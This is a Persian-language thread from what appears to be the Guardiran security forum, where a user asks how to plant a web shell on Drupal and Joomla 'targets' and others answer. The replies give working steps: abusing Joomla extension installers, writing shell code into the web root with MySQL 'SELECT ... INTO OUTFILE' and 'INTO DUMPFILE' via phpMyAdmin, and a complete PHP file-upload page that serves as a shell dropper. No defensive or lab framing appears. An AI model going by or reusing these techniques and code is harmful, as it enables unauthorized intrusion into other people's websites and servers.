رفتن به مطلب
انجمن تیم امنیتی گارد ایران

مشکل در اپلود شل


ارسال های توصیه شده

با سلام

من یک مشکلی در اپلود کردن شل دارم

2 تا سی ام اس دارم یکی دروپال و یکی جوملا

انواع بای پس هارو روشون تست کردم اما شل اپلود نمیشه

تارگت دروپالی گزینه ای PHP نداره که بشه شل از توی تم یا افزودن پیج اضافه کنیم بهش  و بصورت دستی و از اپلودر که میشه تم اپلود کرد FTP ران شده که تا یورپزر و پسورد FTP نزنی اجازه اپلود تم رو نمیدهبه نظرتون چطور میتونم شل بریزم روش ؟

 

تارگت جوملا هم پرم قسمت TEMPLATE و CONFIGURATION رو بسته و اجازه اپلود نمیده ؟ راهی به نظرتون میرسه ؟

 

البته یه PHPMYADMIN از روی سرور دارم و میتونم وصل بشم .از PHPMYADMIN میشه روی جوملا شل ریخت ؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود

ببینید تو جوملا میتونید هنگام اپلود installer پلاگین یا کامپونت شل بریزید یا فایل منیجر جوملا رو نصب کنید و با اون شل بریزید

ولی
اگه php myadmin
هست که کارتون راحته دیگه :)

به شرط اینکه مسیر دایرکتوری رو بدونید

با دستور

@@basedirدوتا کار میتونید بکنید

select "hacked by me" INTO OUTFILE '/var/www/html/assess/test1.php'

اینو ران کنید بجای hacked by me کد شلرتون و به جای

/var/www/html/assess/test1.php

مسیر دایرکتوری

البته خیلی از دوستان با dump اقدام به شل ریختن میکنن ولی این روش راحت تره چون یک خط کد بیشتر نیست

یک کد اپلود ساده هم میشه :

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Uploader - J.ALL_EdiT0r</title>
</head>
<body bgcolor="white">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">>>    *Guardiran Digital Security Team - J.ALL_EdiT0r* Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="" method="post">
<input name="userfile" type="file" /> 
<input type="submit" value="Upload" />
<?php $uploaddir =""; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if

(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div

align=center><font size=5 color=#ff0000>J.ALL_EdiT0r | uploaded successfully</font></body>'; } else { print '<body

bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>J.ALL_EdiT0r | Error !
</font></body>'; } ?>
</form>
</div>
</body>
</html>

این قسمت رو فقط چون باید چند تا متغییر دیگه تعریف میکردم که دایرکتوری رو بگیره مثل pwd

و من تعریف نکردم :دی

برای همون خودتون ادرس روبهش بدید

$uploaddir =""

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود

ببینید تو جوملا میتونید هنگام اپلود installer پلاگین یا کامپونت شل بریزید یا فایل منیجر جوملا رو نصب کنید و با اون شل بریزید

ولی

اگه php myadmin

هست که کارتون راحته دیگه :)

به شرط اینکه مسیر دایرکتوری رو بدونید

با دستور

@@basedirدوتا کار میتونید بکنید

select "hacked by me" INTO OUTFILE '/var/www/html/assess/test1.php'

اینو ران کنید بجای hacked by me کد شلرتون و به جای

/var/www/html/assess/test1.php

مسیر دایرکتوری

البته خیلی از دوستان با dump اقدام به شل ریختن میکنن ولی این روش راحت تره چون یک خط کد بیشتر نیست

یک کد اپلود ساده هم میشه :

این قسمت رو فقط چون باید چند تا متغییر دیگه تعریف میکردم که دایرکتوری رو بگیره مثل pwd

و من تعریف نکردم :دی

برای همون خودتون ادرس روبهش بدید

$uploaddir =""

 

سلام ممنون از پاسختون

راستش کلمپونت ریختم همه راه های ممکنه که به ذهنم رسیده رو امتحان کردم

اصلا هیچی اپلود نمیکنه که من بخوام شل بریزم

از روی phpmyadmin هنوز فقط تست نکردم ببینم شل میشه یا نه

با dump چجوری شل میریزن ؟ میشه یکم توضیح بدید

ممنون از پاسختون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

شما اول یک دیتابیس ایجاد میکنید یا از دیتابیس های سایت استفاده کنید

بعد با این دستور تیبل بسازید :

CREATE TABLE `DB NAME`.`userform` (
`test` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

فقط db name رو تغییر بدید کافی هست

بعد اینزرت کنید :

insert into userform values ('کد شلر ');

بعد دامپش کنید تو یک فایل :

select * into dumpfile 'c:\\wamp\\www\\up.php' from userform

من از رو سیستم خودم کپی کردم شما اگه سرورتون لینوکس بود مسیرش فرق میکنه با / بزنید :)

اگه متوجه نشید تا چن وقت دیگه یک تاپیک درست میکنم اموزش جامع اپلود شل با phpmyadmin
پیروز باشید ...........

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 3 هفته بعد...

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...